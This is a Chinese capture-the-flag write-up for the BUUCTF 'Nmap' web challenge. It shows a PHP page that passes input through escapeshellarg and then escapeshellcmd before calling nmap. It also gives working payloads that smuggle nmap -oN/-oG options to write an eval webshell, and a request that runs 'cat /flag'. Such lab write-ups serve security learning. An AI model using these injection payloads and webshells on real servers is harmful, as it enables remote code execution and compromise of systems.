BUUCTF-WEB 【网鼎杯 2020 朱雀组】Nmap 1

通过nmap -oN -oG 参数 写马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
if (isset($_POST['host'])):
if (!defined('WEB_SCANS')) {
die('Web scans disabled');
}

$host = $_POST['host'];
if(stripos($host,'php')!==false){
die("Hacker...");
}
$host = escapeshellarg($host);
$host = escapeshellcmd($host);

$filename = substr(md5(time() . rand(1, 10)), 0, 5);
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
if (is_null($result_scan)) {
die('Something went wrong');
} else {
header('Location: result.php?f=' . $filename);
}

拿到flag

payload

过滤了php 关键字

1
2
3
4
第一种
'<?=eval($_GET[a]);?> -oN flag.phtml '
第二种
'<?=eval($_GET[a]);?> -oG flag.phtml '
1
?a=system("cat /flag");

两个知识点

Nmap 通过 -oG -oN 参数写 shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
> nmap 127.0.0.1 -p 0-1 "<?php eval($_GET['cmd']);?>" -oN cmd.php
Starting Nmap 7.70 ( https://nmap.org ) at 2021-04-14 16:51 ?D1ú±ê×?ê±??
Failed to resolve "<?php eval($_GET['cmd']);?>".
Failed to resolve "<?php eval($_GET['cmd']);?>".
Skipping SYN Stealth Scan against xmind.net (127.0.0.1) because Windows does not support scanning your own machine (localhost) this way.
Nmap scan report for xmind.net (127.0.0.1)
Host is up.

PORT STATE SERVICE
0/tcp unknown unknown
1/tcp unknown tcpmux

Failed to resolve "<?php eval($_GET['cmd']);?>".
Nmap done: 1 IP address (1 host up) scanned in 4.64 seconds

C:\Users\root\Desktop
> dir
驱动器 C 中的卷是 Win10
卷的序列号是 C037-0A2C

C:\Users\root\Desktop 的目录

2021/04/14 16:51 <DIR> .
2021/04/14 16:51 <DIR> ..
2021/04/14 16:51 528 cmd.php # 生成了cmd.php 文件
1 个文件 528 字节
2 个目录 7,621,890,048 可用字节

生成的文件会将 "<?php eval($_GET['cmd']);?>" 和 扫描的结果 一起写入cmd.php文件中 ,

1
nmap 127.0.0.1 -p 0-1 "<?php eval($_POST['cmd']);?>" -oG cmd.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
> nmap 127.0.0.1 -p 0-1 "<?php eval($_POST['cmd']);?>" -oG cmd.php
Starting Nmap 7.70 ( https://nmap.org ) at 2021-04-14 16:56 ?D1ú±ê×?ê±??
Failed to resolve "<?php eval($_POST['cmd']);?>".
Failed to resolve "<?php eval($_POST['cmd']);?>".
Skipping SYN Stealth Scan against xmind.net (127.0.0.1) because Windows does not support scanning your own machine (localhost) this way.
Nmap scan report for xmind.net (127.0.0.1)
Host is up.

PORT STATE SERVICE
0/tcp unknown unknown
1/tcp unknown tcpmux

Failed to resolve "<?php eval($_POST['cmd']);?>".
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

C:\Users\root\Desktop
> cat cmd.php
# Nmap 7.70 scan initiated Wed Apr 14 16:56:04 2021 as: F:\Tools\WEB\PentestBox\bin\Nmap\nmap.exe -p 0-1 -oG cmd.php 127.0.0.1 <?php eval($_POST['cmd']);?>
Host: 127.0.0.1 (xmind.net) Status: Up
Host: 127.0.0.1 (xmind.net) Ports: 0/unknown/tcp/////, 1/unknown/tcp//tcpmux///
# Nmap done at Wed Apr 14 16:56:08 2021 -- 1 IP address (1 host up) scanned in 4.59 seconds

顺便说一下,nmap的其他参数 ,比如-oX,也会创建文件,但是符合会被替换成html字符,想这样 &lt;?php eval($_POST[&apos;cmd&apos;]);?&gt;,也就是说只有两种参数能用。

sescapeshellarg和escapeshellcmd 同时使用照成的问题
1
2
3
4
5
<?php
$str = "sys'tem";
echo escapeshellarg($str);
?>
// 'sys'\''tem'

直接将 ' 转义成了 '\''

1
2
3
4
5
6
<?php
$str = "sys'tem";
echo escapeshellcmd($str);
?>

// sys\'tem

' 转义成了 \'

最后将两个函数同时使用

1
2
3
4
5
6
7
8
<?php
$str = "sys'tem";
$str = escapeshellarg($str);
$str = escapeshellcmd($str);
echo $str;
?>
// 'sys'\\''tem\'
// sys\tem'

这里的问题就很明显了,两个函数同时使用,会照成某些字符串逃逸。

1
2
3
4
5
6
7
8
9
10
11
<?php
$host = ' <?php eval($_POST["cmd"]);?> -oN cmd.php ';
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$command = "nmap ". $host;
echo $command;

?>

// nmap ' \<\?php eval\(\$_POST\[\"cmd\"\]\)\;\?\> -oN cmd.php '
// nmap ' <?php eval($_POST["cmd"]);?> -oN cmd.php '